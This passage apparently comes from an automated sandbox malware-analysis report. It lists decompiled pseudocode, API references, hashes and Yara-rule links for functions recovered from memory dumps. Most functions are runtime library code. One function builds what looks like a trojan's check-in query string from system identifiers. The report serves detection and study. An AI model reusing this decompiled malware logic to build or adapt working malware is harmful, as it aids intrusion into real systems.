				signed int _t86;
				void* _t89;
				void* _t95;
				void* _t96;
				void* _t99;
				void* _t106;

				_t43 = _t84;
				_t65 = __ebx + 2;
				 *_t43 =  *_t43 ^ __edx ^  *__eax;
				_t89 = _t95;
				_t96 = _t95 - 8;
				_push(_t65);
				_push(_t84);
				_push(_t89);
				asm("cld");
				_t66 = _a8;
				_t44 = _a4;
				if(( *(_t44 + 4) & 0x00000006) != 0) {
					_push(_t89);
					E6ECE231B(_t66 + 0x10, _t66, 0xffffffff);
					_t46 = 1;
				} else {
					_v12 = _t44;
					_v8 = _a12;
					 *((intOrPtr*)(_t66 - 4)) =  &_v12;
					_t86 =  *(_t66 + 0xc);
					_t80 =  *(_t66 + 8);
					_t49 = E6ECE23D5(_t66);
					_t99 = _t96 + 4;
					if(_t49 == 0) {
						 *(_a4 + 4) =  *(_a4 + 4) | 0x00000008;
						goto L11;
					} else {
						while(_t86 != 0xffffffff) {
							_t53 =  *((intOrPtr*)(_t80 + 4 + (_t86 + _t86 * 2) * 4));
							if(_t53 == 0) {
								L8:
								_t80 =  *(_t66 + 8);
								_t86 = _t80[_t86 + _t86 * 2];
								continue;
							} else {
								_t54 =  *_t53();
								_t89 = _t89;
								_t86 = _t86;
								_t66 = _a8;
								_t55 = _t54;
								_t106 = _t54;
								if(_t106 == 0) {
									goto L8;
								} else {
									if(_t106 < 0) {
										_t46 = 0;
									} else {
										_t82 =  *(_t66 + 8);
										E6ECE22C0(_t55, _t66);
										_t89 = _t66 + 0x10;
										E6ECE231B(_t89, _t66, 0);
										_t99 = _t99 + 0xc;
										E6ECE23B7(_t82[2]);
										 *(_t66 + 0xc) =  *_t82;
										_t66 = 0;
										_t86 = 0;
										 *(_t82[2])(1);
										goto L8;
									}
								}
							}
							goto L13;
						}
						L11:
						_t46 = 1;
					}
				}
				L13:
				return _t46;
			}

0x6ece21b8
0x6ece21b9
0x6ece21ba
0x6ece21bd
0x6ece21bf
0x6ece21c2
0x6ece21c3
0x6ece21c5
0x6ece21c6
0x6ece21c7
0x6ece21ca
0x6ece21d4
0x6ece2285
0x6ece228c
0x6ece2295
0x6ece21da
0x6ece21da
0x6ece21e0
0x6ece21e6
0x6ece21e9
0x6ece21ec
0x6ece21f0
0x6ece21f5
0x6ece21fa
0x6ece227a
0x00000000
0x6ece21fc
0x6ece21fc
0x6ece2208
0x6ece220a
0x6ece2265
0x6ece2265
0x6ece226b
0x00000000
0x6ece220c
0x6ece221b
0x6ece221d
0x6ece221e
0x6ece221f
0x6ece2222
0x6ece2222
0x6ece2224
0x00000000
0x6ece2226
0x6ece2226
0x6ece2270
0x6ece2228
0x6ece2228
0x6ece222c
0x6ece2234
0x6ece2239
0x6ece223e
0x6ece224a
0x6ece2252
0x6ece2259
0x6ece225f
0x6ece2263
0x00000000
0x6ece2263
0x6ece2226
0x6ece2224
0x00000000
0x6ece220a
0x6ece227e
0x6ece227e
0x6ece227e
0x6ece21fa
0x6ece229a
0x6ece22a1

Memory Dump Source

Source File: 00000000.00000002.644187426.000000006ECE1000.00000020.00020000.sdmp, Offset: 6ECE0000, based on PE: true

Associated: 00000000.00000002.644138464.000000006ECE0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.644226108.000000006ECE3000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.644252899.000000006ECE5000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.644278695.000000006ECE6000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 12a7070065f657aa0aacf06b7ef6137888dfa06173cfdd6141a47a1bb7c7c469
Instruction ID: 9e7d3000043b69115e7e56d8a732fb886e21144782883150684e140e6d893ca6
Opcode Fuzzy Hash: 12a7070065f657aa0aacf06b7ef6137888dfa06173cfdd6141a47a1bb7c7c469
Instruction Fuzzy Hash: 8F21D6339042069FDB04DFA8D890AA7B7A9FF49360B058568D9558B249E730FE15CBE0

Uniqueness

Uniqueness Score: -1.00%

Function 6ED1E8C0, Relevance: .1, Instructions: 76COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.644410383.000000006ECF0000.00000020.00020000.sdmp, Offset: 6ECF0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
Instruction ID: e3de7d17f3653f8294160f51e8f4cd4fe13983557e531361837fd22e1295454d
Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
Instruction Fuzzy Hash: 6A1122B724C043C3D6C087EEF4B46EAE396EBCA235714437BD8528BD58D123E1459600

Uniqueness

Uniqueness Score: -1.00%

Function 6ED8DBB5, Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.645204954.000000006ED8D000.00000040.00020000.sdmp, Offset: 6ED8D000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2473ecba5f78466b236b706d564a53f6938cb11cd03c01b5ec765ffc181c916c
Instruction ID: bb3be35b456a2a992c9c408402729544497a1abd40b34bc130ebd32511306d95
Opcode Fuzzy Hash: 2473ecba5f78466b236b706d564a53f6938cb11cd03c01b5ec765ffc181c916c
Instruction Fuzzy Hash: 5E1190733401019FD754DF99DC90EA7B3EEEB99230B2980AAED04CB355D676E841CB60

Uniqueness

Uniqueness Score: -1.00%

Function 6ED8DEAA, Relevance: .1, Instructions: 55COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.645204954.000000006ED8D000.00000040.00020000.sdmp, Offset: 6ED8D000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d6db8e1f961792d163c78665be140d0242f94593fd5b6291162898feff87c4c3
Instruction ID: 667f48f6e64232724f4417b7370a081b209bc66c7b387747cf850a332c686d37
Opcode Fuzzy Hash: d6db8e1f961792d163c78665be140d0242f94593fd5b6291162898feff87c4c3
Instruction Fuzzy Hash: 4601C032354281CFD75ADB6ED89496FB7E8EBD2328B15817FC486C3659D230E846CE20

Uniqueness

Uniqueness Score: -1.00%

Function 6ED48861, Relevance: .0, Instructions: 22COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.644410383.000000006ECF0000.00000020.00020000.sdmp, Offset: 6ECF0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7fd1dc8cc4201bab0dfbcad80c1a42e0146a61ef2c67b76f7307b9c56e3daa6f
Instruction ID: 99258b7b10459f99b3c8c7a732af2da98cd7b146d1b7fcfb610f55c4bf6caeae
Opcode Fuzzy Hash: 7fd1dc8cc4201bab0dfbcad80c1a42e0146a61ef2c67b76f7307b9c56e3daa6f
Instruction Fuzzy Hash: 7AE08C32911238EBCB14CBC8D94098AB3ECEB48B94B154496B511D3140D270DE00CBE1

Uniqueness

Uniqueness Score: -1.00%

Function 6ED16CAF, Relevance: 77.3, APIs: 32, Strings: 12, Instructions: 287COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 6ED16CB6
collate.LIBCPMT ref: 6ED16CBF

Part of subcall function 6ED159D8: __EH_prolog3_GS.LIBCMT ref: 6ED159DF
Part of subcall function 6ED159D8: __Getcoll.LIBCPMT ref: 6ED15A43
Part of subcall function 6ED159D8: std::_Locinfo::~_Locinfo.LIBCPMT ref: 6ED15A5F

__Getcoll.LIBCPMT ref: 6ED16D05
std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 6ED16D19
std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 6ED16D2E
std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 6ED16D7F
std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 6ED16EB4
std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 6ED16EC7
int.LIBCPMT ref: 6ED16ED4
std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 6ED16EE4
int.LIBCPMT ref: 6ED16EF1
std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 6ED16F01
int.LIBCPMT ref: 6ED16F0E
std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 6ED16F1E
int.LIBCPMT ref: 6ED16CDF

Part of subcall function 6ED0207B: std::_Lockit::_Lockit.LIBCPMT ref: 6ED0208C
Part of subcall function 6ED0207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6ED020A6

int.LIBCPMT ref: 6ED16D42
std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 6ED16D6C
int.LIBCPMT ref: 6ED16D97
std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 6ED16DC5
int.LIBCPMT ref: 6ED16DD2
std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 6ED16DF9
int.LIBCPMT ref: 6ED16E06
std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 6ED16E56
int.LIBCPMT ref: 6ED16E63
int.LIBCPMT ref: 6ED16F36
numpunct.LIBCPMT ref: 6ED16F5D
std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 6ED16F6D
int.LIBCPMT ref: 6ED16F7A
std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 6ED16FB1
std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 6ED16FC4
int.LIBCPMT ref: 6ED16FD1
std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 6ED16FE1

Strings

L=n, xrefs: 6ED16F09
8=n, xrefs: 6ED16CDA
L=n, xrefs: 6ED16E5E
H=n, xrefs: 6ED16E01
P=n, xrefs: 6ED16F31
T=n, xrefs: 6ED16F75
D=n, xrefs: 6ED16DCD
@=n, xrefs: 6ED16D92
<=n, xrefs: 6ED16D3D
H=n, xrefs: 6ED16EEC
D=n, xrefs: 6ED16ECF
T=n, xrefs: 6ED16FCC

Memory Dump Source

Source File: 00000000.00000002.644410383.000000006ECF0000.00000020.00020000.sdmp, Offset: 6ECF0000, based on PE: false

Similarity

API ID: AddfacLocimp::_Locimp_std::locale::_$std::_$GetcollLockit$H_prolog3H_prolog3_LocinfoLocinfo::~_Lockit::_Lockit::~_collatenumpunct
String ID: 8=n$<=n$@=n$D=n$D=n$H=n$H=n$L=n$L=n$P=n$T=n$T=n
API String ID: 2009638416-3048463476
Opcode ID: 3ec39be6711658a0b4d38dd86cc5a6473cbde5b26e9f405b357cabb15ba781b4
Instruction ID: 5adf641cdd75b17193e9c96872bc9cb65393568751c7d6ed1baa52d3415d98e2
Opcode Fuzzy Hash: 3ec39be6711658a0b4d38dd86cc5a6473cbde5b26e9f405b357cabb15ba781b4
Instruction Fuzzy Hash: 9691B5B1E19311AFEB205FF5AC45AFF7AAC9F52758F144E18E9546B240EB34890087B2

Uniqueness

Uniqueness Score: -1.00%

Function 00756109, Relevance: 40.5, APIs: 22, Strings: 1, Instructions: 244
memorystringCOMMON

Download Yara Rule

C-Code - Quality: 74%

			E00756109(long __eax, void* __ecx, void* __edx, intOrPtr _a4, char** _a8, int* _a12, void* _a16) {
				void* _v8;
				signed int _v12;
				void* _v16;
				void* _v20;
				void* _v24;
				void* _v28;
				void* __ebx;
				void* __edi;
				long _t59;
				intOrPtr _t60;
				intOrPtr _t61;
				intOrPtr _t62;
				intOrPtr _t63;
				intOrPtr _t64;
				void* _t67;
				intOrPtr _t68;
				int _t71;
				void* _t72;
				void* _t73;
				void* _t75;
				void* _t78;
				intOrPtr _t82;
				intOrPtr _t86;
				intOrPtr* _t88;
				void* _t94;
				intOrPtr _t100;
				signed int _t104;
				char** _t106;
				int _t109;
				intOrPtr* _t112;
				intOrPtr* _t114;
				intOrPtr* _t116;
				intOrPtr* _t118;
				intOrPtr _t121;
				intOrPtr _t126;
				int _t130;
				CHAR* _t132;
				intOrPtr _t133;
				void* _t134;
				void* _t143;
				int _t144;
				void* _t145;
				intOrPtr _t146;
				void* _t148;
				long _t152;
				intOrPtr* _t153;
				intOrPtr* _t154;
				intOrPtr* _t157;
				void* _t158;
				void* _t160;

				_t143 = __edx;
				_t134 = __ecx;
				_t59 = __eax;
				_v12 = 8;
				if(__eax == 0) {
					_t59 = GetTickCount();
				}
				_t60 =  *0x75d018; // 0x1f7541c4
				asm("bswap eax");
				_t61 =  *0x75d014; // 0x3a87c8cd
				_t2 =  &_a16; // 0x75553a
				_t132 =  *_t2;
				asm("bswap eax");
				_t62 = E0075D010; // 0xd8d2f808
				asm("bswap eax");
				_t63 =  *0x75d00c; // 0x8f8f86c2
				asm("bswap eax");
				_t64 =  *0x75d2e0; // 0x25ca5a8
				_t3 = _t64 + 0x75e633; // 0x74666f73
				_t144 = wsprintfA(_t132, _t3, 3, 0x3f874, _t63, _t62, _t61, _t60,  *0x75d02c,  *0x75d004, _t59);
				_t67 = E00755B60();
				_t68 =  *0x75d2e0; // 0x25ca5a8
				_t4 = _t68 + 0x75e673; // 0x74707526
				_t71 = wsprintfA(_t144 + _t132, _t4, _t67);
				_t160 = _t158 + 0x38;
				_t145 = _t144 + _t71;
				_t72 = E00751BBF(_t134);
				_t133 = __imp__;
				_v8 = _t72;
				if(_t72 != 0) {
					_t126 =  *0x75d2e0; // 0x25ca5a8
					_t7 = _t126 + 0x75e8cc; // 0x736e6426
					_t130 = wsprintfA(_a16 + _t145, _t7, _t72);
					_t160 = _t160 + 0xc;
					_t145 = _t145 + _t130;
					HeapFree( *0x75d270, 0, _v8);
				}
				_t73 = E0075137A();
				_v8 = _t73;
				if(_t73 != 0) {
					_t121 =  *0x75d2e0; // 0x25ca5a8
					_t11 = _t121 + 0x75e8d4; // 0x6f687726
					wsprintfA(_t145 + _a16, _t11, _t73);
					_t160 = _t160 + 0xc;
					HeapFree( *0x75d270, 0, _v8);
				}
				_t146 =  *0x75d364; // 0x2d295b0
				_t75 = E00753857(0x75d00a, _t146 + 4);
				_t152 = 0;
				_v20 = _t75;
				if(_t75 == 0) {
					L26:
					HeapFree( *0x75d270, _t152, _a16);
					return _v12;
				} else {
					_t78 = RtlAllocateHeap( *0x75d270, 0, 0x800);
					_v8 = _t78;
					if(_t78 == 0) {
						L25:
						HeapFree( *0x75d270, _t152, _v20);
						goto L26;
					}
					E0075A811(GetTickCount());
					_t82 =  *0x75d364; // 0x2d295b0
					__imp__(_t82 + 0x40);
					asm("lock xadd [eax], ecx");
					_t86 =  *0x75d364; // 0x2d295b0
					__imp__(_t86 + 0x40);
					_t88 =  *0x75d364; // 0x2d295b0
					_t148 = E00751974(1, _t143, _a16,  *_t88);
					_v28 = _t148;
					asm("lock xadd [eax], ecx");
					if(_t148 == 0) {
						L24:
						HeapFree( *0x75d270, _t152, _v8);
						goto L25;
					}
					StrTrimA(_t148, 0x75c2ac);
					_push(_t148);
					_t94 = E007538CA();
					_v16 = _t94;
					if(_t94 == 0) {
						L23:
						HeapFree( *0x75d270, _t152, _t148);
						goto L24;
					}
					_t153 = __imp__;
					 *_t153(_t148, _a4);
					 *_t153(_v8, _v20);
					_t154 = __imp__;
					 *_t154(_v8, _v16);
					_t100 = E00751922( *_t154(_v8, _t148), _v8);
					_a4 = _t100;
					if(_t100 == 0) {
						_v12 = 8;
						L21:
						E007547D5();
						L22:
						HeapFree( *0x75d270, 0, _v16);
						_t152 = 0;
						goto L23;
					}
					_t104 = E0075365D(_t133, 0xffffffffffffffff, _t148,  &_v24);
					_v12 = _t104;
					if(_t104 == 0) {
						_t157 = _v24;
						_v12 = E00753273(_t157, _a4, _a8, _a12);
						_t112 =  *((intOrPtr*)(_t157 + 8));
						 *((intOrPtr*)( *_t112 + 0x80))(_t112);
						_t114 =  *((intOrPtr*)(_t157 + 8));
						 *((intOrPtr*)( *_t114 + 8))(_t114);
						_t116 =  *((intOrPtr*)(_t157 + 4));
						 *((intOrPtr*)( *_t116 + 8))(_t116);
						_t118 =  *_t157;
						 *((intOrPtr*)( *_t118 + 8))(_t118);
						E00754AAB(_t157);
					}
					if(_v12 != 0x10d2) {
						L16:
						if(_v12 == 0) {
							_t106 = _a8;
							if(_t106 != 0) {
								_t149 =  *_t106;
								_t155 =  *_a12;
								wcstombs( *_t106,  *_t106,  *_a12);
								_t109 = E00758FB2(_t149, _t149, _t155 >> 1);
								_t148 = _v28;
								 *_a12 = _t109;
							}
						}
						goto L19;
					} else {
						if(_a8 != 0) {
							L19:
							E00754AAB(_a4);
							if(_v12 == 0 || _v12 == 0x10d2) {
								goto L22;
							} else {
								goto L21;
							}
						}
						_v12 = _v12 & 0x00000000;
						goto L16;
					}
				}
			}

0x00756109
0x00756109
0x00756109
0x00756112
0x0075611b
0x0075611d
0x0075611d
0x0075612a
0x00756135
0x00756138
0x0075613d
0x0075613d
0x00756146
0x00756149
0x0075614e
0x00756151
0x00756156
0x00756159
0x00756165
0x00756172
0x00756174
0x0075617a
0x0075617f
0x0075618a
0x0075618c
0x0075618f
0x00756191
0x00756196
0x0075619c
0x007561a1
0x007561a4
0x007561a9
0x007561b6
0x007561b8
0x007561be
0x007561c8
0x007561c8
0x007561ca
0x007561cf
0x007561d4
0x007561d7
0x007561dc
0x007561e9
0x007561eb
0x007561f9
0x007561f9
0x007561fb
0x00756209
0x0075620e
0x00756210
0x00756215
0x007563d6
0x007563e0
0x007563e9
0x0075621b
0x00756227
0x0075622d
0x00756232
0x007563ca
0x007563d4
0x00000000
0x007563d4
0x0075623e
0x00756243
0x0075624c
0x0075625d
0x00756261
0x0075626a
0x00756270
0x0075627f
0x00756286
0x0075628f
0x00756295
0x007563be
0x007563c8
0x00000000
0x007563c8
0x007562a1
0x007562a7
0x007562a8
0x007562ad
0x007562b2
0x007563b4
0x007563bc
0x00000000
0x007563bc
0x007562bb
0x007562c2
0x007562ca
0x007562cf
0x007562d8
0x007562e3
0x007562e8
0x007562ed
0x007563ec
0x007563a0
0x007563a0
0x007563a5
0x007563b0
0x007563b2
0x00000000
0x007563b2
0x007562f7
0x007562fc
0x00756301
0x00756306
0x00756316
0x00756319
0x0075631f
0x00756325
0x0075632b
0x0075632e
0x00756334
0x00756337
0x0075633c
0x00756340
0x00756340
0x0075634c
0x00756358
0x0075635c
0x0075635e
0x00756363
0x00756365
0x0075636a
0x0075636f
0x0075637c
0x00756384
0x00756387
0x00756387
0x00756363
0x00000000
0x0075634e
0x00756352
0x00756389
0x0075638c
0x00756395
0x00000000
0x00000000
0x00000000
0x00000000
0x00756395
0x00756354
0x00000000
0x00756354
0x0075634c

APIs

GetTickCount.KERNEL32 ref: 0075611D
wsprintfA.USER32 ref: 0075616D
wsprintfA.USER32 ref: 0075618A
wsprintfA.USER32 ref: 007561B6
HeapFree.KERNEL32(00000000,?), ref: 007561C8
wsprintfA.USER32 ref: 007561E9
HeapFree.KERNEL32(00000000,?), ref: 007561F9
RtlAllocateHeap.NTDLL(00000000,00000800), ref: 00756227
GetTickCount.KERNEL32 ref: 00756238
RtlEnterCriticalSection.NTDLL(02D29570), ref: 0075624C
RtlLeaveCriticalSection.NTDLL(02D29570), ref: 0075626A

Part of subcall function 00751974: lstrlen.KERNEL32(00000000,253D7325,00000000,00000000,74ECC740,?,?,00754653,?,02D295B0), ref: 0075199F
Part of subcall function 00751974: lstrlen.KERNEL32(?,?,?,00754653,?,02D295B0), ref: 007519A7
Part of subcall function 00751974: strcpy.NTDLL ref: 007519BE
Part of subcall function 00751974: lstrcat.KERNEL32(00000000,?), ref: 007519C9
Part of subcall function 00751974: StrTrimA.SHLWAPI(00000000,=,00000000,00000000,?,?,?,00754653,?,02D295B0), ref: 007519E6

StrTrimA.SHLWAPI(00000000,0075C2AC,?,02D295B0), ref: 007562A1

Part of subcall function 007538CA: lstrlen.KERNEL32(02D29B10,00000000,00000000,74ECC740,0075467E,00000000), ref: 007538DA
Part of subcall function 007538CA: lstrlen.KERNEL32(?), ref: 007538E2
Part of subcall function 007538CA: lstrcpy.KERNEL32(00000000,02D29B10), ref: 007538F6
Part of subcall function 007538CA: lstrcat.KERNEL32(00000000,?), ref: 00753901

lstrcpy.KERNEL32(00000000,?), ref: 007562C2
lstrcpy.KERNEL32(?,?), ref: 007562CA
lstrcat.KERNEL32(?,?), ref: 007562D8
lstrcat.KERNEL32(?,00000000), ref: 007562DE

Part of subcall function 00751922: lstrlen.KERNEL32(?,00000000,02D29B38,00000000,007574FF,02D29D16,?,?,?,?,?,69B25F44,00000005,0075D00C), ref: 00751929
Part of subcall function 00751922: mbstowcs.NTDLL ref: 00751952
Part of subcall function 00751922: memset.NTDLL ref: 00751964

wcstombs.NTDLL ref: 0075636F

Part of subcall function 00753273: SysAllocString.OLEAUT32(?), ref: 007532AE

Part of subcall function 00754AAB: RtlFreeHeap.NTDLL(00000000,00000000,00755012,00000000,?,?,00000000), ref: 00754AB7

HeapFree.KERNEL32(00000000,?,?), ref: 007563B0
HeapFree.KERNEL32(00000000,00000000,00000000), ref: 007563BC
HeapFree.KERNEL32(00000000,?,?,02D295B0), ref: 007563C8
HeapFree.KERNEL32(00000000,?), ref: 007563D4
HeapFree.KERNEL32(00000000,?), ref: 007563E0

Strings

:Uu, xrefs: 0075613D, 0075616C

Memory Dump Source

Source File: 00000000.00000002.638931925.0000000000751000.00000020.00020000.sdmp, Offset: 00750000, based on PE: true

Associated: 00000000.00000002.638878437.0000000000750000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.639187632.000000000075C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.639241972.000000000075D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.639332156.000000000075F000.00000002.00020000.sdmp Download File

Similarity

API ID: Heap$Free$lstrlen$lstrcatwsprintf$lstrcpy$CountCriticalSectionTickTrim$AllocAllocateEnterLeaveStringmbstowcsmemsetstrcpywcstombs
String ID: :Uu
API String ID: 3748877296-824088054
Opcode ID: 7bec693ed3222445f17c94337f0ac51b8674ac7730a3013f1c0f262d8118ad98
Instruction ID: 54b8c7b94c3cfbf92448e6ee04a601f7541e03b7645d1e381c18a385d1c8f014
Opcode Fuzzy Hash: 7bec693ed3222445f17c94337f0ac51b8674ac7730a3013f1c0f262d8118ad98
Instruction Fuzzy Hash: 03914771900208EFCB219FA4DC48AEE7BB9FF08352F148054F808D7260DBB9AD55DBA5

Uniqueness

Uniqueness Score: -1.00%

Function 6ED4B2A4, Relevance: 19.6, APIs: 13, Instructions: 113COMMON

Download Yara Rule

APIs

___free_lconv_mon.LIBCMT ref: 6ED4B2E8

Part of subcall function 6ED4C9F8: _free.LIBCMT ref: 6ED4CA15
Part of subcall function 6ED4C9F8: _free.LIBCMT ref: 6ED4CA27
Part of subcall function 6ED4C9F8: _free.LIBCMT ref: 6ED4CA39
Part of subcall function 6ED4C9F8: _free.LIBCMT ref: 6ED4CA4B
Part of subcall function 6ED4C9F8: _free.LIBCMT ref: 6ED4CA5D
Part of subcall function 6ED4C9F8: _free.LIBCMT ref: 6ED4CA6F
Part of subcall function 6ED4C9F8: _free.LIBCMT ref: 6ED4CA81
Part of subcall function 6ED4C9F8: _free.LIBCMT ref: 6ED4CA93
Part of subcall function 6ED4C9F8: _free.LIBCMT ref: 6ED4CAA5
Part of subcall function 6ED4C9F8: _free.LIBCMT ref: 6ED4CAB7
Part of subcall function 6ED4C9F8: _free.LIBCMT ref: 6ED4CAC9
Part of subcall function 6ED4C9F8: _free.LIBCMT ref: 6ED4CADB
Part of subcall function 6ED4C9F8: _free.LIBCMT ref: 6ED4CAED

_free.LIBCMT ref: 6ED4B2DD

Part of subcall function 6ED41434: HeapFree.KERNEL32(00000000,00000000,?,6ED4D1C0,?,00000000,?,?,?,6ED4D4C4,?,00000007,?,?,6ED4B43B,?), ref: 6ED4144A
Part of subcall function 6ED41434: GetLastError.KERNEL32(?,?,6ED4D1C0,?,00000000,?,?,?,6ED4D4C4,?,00000007,?,?,6ED4B43B,?,?), ref: 6ED4145C

_free.LIBCMT ref: 6ED4B2FF
_free.LIBCMT ref: 6ED4B314
_free.LIBCMT ref: 6ED4B31F
_free.LIBCMT ref: 6ED4B341
_free.LIBCMT ref: 6ED4B354
_free.LIBCMT ref: 6ED4B362
_free.LIBCMT ref: 6ED4B36D
_free.LIBCMT ref: 6ED4B3A5
_free.LIBCMT ref: 6ED4B3AC
_free.LIBCMT ref: 6ED4B3C9
_free.LIBCMT ref: 6ED4B3E1

Memory Dump Source

Source File: 00000000.00000002.644410383.000000006ECF0000.00000020.00020000.sdmp, Offset: 6ECF0000, based on PE: false

Similarity

API ID: _free$ErrorFreeHeapLast___free_lconv_mon
String ID:
API String ID: 161543041-0
Opcode ID: 48c018023a6f9e488b06c3d06272e271d118736519cc4b537de5d21d40eae83b
Instruction ID: fb449d364f994ee9a53caee5282c50d86c3538d51b819710a0a0a3e99b9f5c25
Opcode Fuzzy Hash: 48c018023a6f9e488b06c3d06272e271d118736519cc4b537de5d21d40eae83b
Instruction Fuzzy Hash: C7312732605609EFEB519BFAD848BDE73E8EF30354F548829E059D6199DF34E894CB20

Uniqueness

Uniqueness Score: -1.00%

Function 6ED15681, Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 66COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 6ED15688
std::_Lockit::_Lockit.LIBCPMT ref: 6ED15692
int.LIBCPMT ref: 6ED156A9

Part of subcall function 6ED0207B: std::_Lockit::_Lockit.LIBCPMT ref: 6ED0208C
Part of subcall function 6ED0207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6ED020A6

std::_Facet_Register.LIBCPMT ref: 6ED156E3
std::_Lockit::~_Lockit.LIBCPMT ref: 6ED15703
Concurrency::cancel_current_task.LIBCPMT ref: 6ED15710
__EH_prolog3.LIBCMT ref: 6ED1571D

Strings

T=n, xrefs: 6ED1569D

Memory Dump Source

Source File: 00000000.00000002.644410383.000000006ECF0000.00000020.00020000.sdmp, Offset: 6ECF0000, based on PE: false

Similarity

API ID: std::_$Lockit$H_prolog3Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
String ID: T=n
API String ID: 3920336645-3289637788
Opcode ID: ce5fb297b8bd7435ca25c8363d263b2adc11739a1bae758ef317e1649f1646e6
Instruction ID: f9c1ce157a5584ce30ac5b83b104f1363f33cc8f45872b34334d62e434040868
Opcode Fuzzy Hash: ce5fb297b8bd7435ca25c8363d263b2adc11739a1bae758ef317e1649f1646e6
Instruction Fuzzy Hash: 0721D575904659DFCF02CFE4D9446EDBBB9BF45728F144909E8106B390CB74DA05CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 6ED07D9F, Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 66COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 6ED07DA6
std::_Lockit::_Lockit.LIBCPMT ref: 6ED07DB0
int.LIBCPMT ref: 6ED07DC7

Part of subcall function 6ED0207B: std::_Lockit::_Lockit.LIBCPMT ref: 6ED0208C
Part of subcall function 6ED0207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6ED020A6

std::_Facet_Register.LIBCPMT ref: 6ED07E01
std::_Lockit::~_Lockit.LIBCPMT ref: 6ED07E21
Concurrency::cancel_current_task.LIBCPMT ref: 6ED07E2E
__EH_prolog3.LIBCMT ref: 6ED07E3B

Strings

x<n, xrefs: 6ED07DBB

Memory Dump Source

Source File: 00000000.00000002.644410383.000000006ECF0000.00000020.00020000.sdmp, Offset: 6ECF0000, based on PE: false

Similarity

API ID: std::_$Lockit$H_prolog3Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
String ID: x<n
API String ID: 3920336645-2300383073
Opcode ID: c2444aafcc72f13da33ca26d571cd9f6ca1656aa3b6d7ecaf9fce721390f4f69
Instruction ID: 60792485e55a5944d2c5cfa9a4ecbe1769c71c9377cdd24b84dcb269d86a544a
Opcode Fuzzy Hash: c2444aafcc72f13da33ca26d571cd9f6ca1656aa3b6d7ecaf9fce721390f4f69
Instruction Fuzzy Hash: 7221A17590461AEBCF01DFE4D945AED7BB9AF45718F28490AE8106B380DB70DE05CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 6ED154C2, Relevance: 14.0, APIs: 7, Strings: 1, Instructions: 49COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 6ED154C9
std::_Lockit::_Lockit.LIBCPMT ref: 6ED154D3
int.LIBCPMT ref: 6ED154EA

Part of subcall function 6ED0207B: std::_Lockit::_Lockit.LIBCPMT ref: 6ED0208C
Part of subcall function 6ED0207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6ED020A6

moneypunct.LIBCPMT ref: 6ED1550D
std::_Facet_Register.LIBCPMT ref: 6ED15524
std::_Lockit::~_Lockit.LIBCPMT ref: 6ED15544
Concurrency::cancel_current_task.LIBCPMT ref: 6ED15551

Strings

L=n, xrefs: 6ED154DE

Memory Dump Source

Source File: 00000000.00000002.644410383.000000006ECF0000.00000020.00020000.sdmp, Offset: 6ECF0000, based on PE: false

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Registermoneypunct
String ID: L=n
API String ID: 3376033448-731276138
Opcode ID: 8ef512022b8cbb9884f409dc22c00a56bc23262b056973ee1a740e8669bf924a
Instruction ID: 28a70b065971a296d7c4d6990be804d26a99e4485d0523038289077373051a7b
Opcode Fuzzy Hash: 8ef512022b8cbb9884f409dc22c00a56bc23262b056973ee1a740e8669bf924a
Instruction Fuzzy Hash: 1B01C03190451A9BCF05CFE4D944AEDB77AAF45328F240909D8216B3C0DF74DA058BA1

Uniqueness

Uniqueness Score: -1.00%

Function 6ED15557, Relevance: 14.0, APIs: 7, Strings: 1, Instructions: 49COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 6ED1555E
std::_Lockit::_Lockit.LIBCPMT ref: 6ED15568
int.LIBCPMT ref: 6ED1557F

